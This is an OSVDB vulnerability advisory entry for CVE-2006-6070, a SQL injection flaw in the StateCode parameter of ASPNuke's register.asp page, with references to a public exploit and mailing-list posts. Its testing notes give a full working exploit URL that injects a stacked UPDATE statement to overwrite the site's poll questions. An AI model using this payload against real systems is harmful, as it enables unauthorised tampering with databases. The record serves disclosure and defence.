ASPNuke register.asp StateCode Variable SQL Injection

2006-11-19T02:09:37
ID OSVDB:31918
Type osvdb
Reporter OSVDB
Modified 2006-11-19T02:09:37

Description

Manual Testing Notes

/module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register

References:

Vendor URL: http://www.aspnuke.com/
Security Tracker: 1017255
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0374.html
ISS X-Force ID: 30397
Generic Exploit URL: http://www.milw0rm.com/exploits/2813
CVE-2006-6070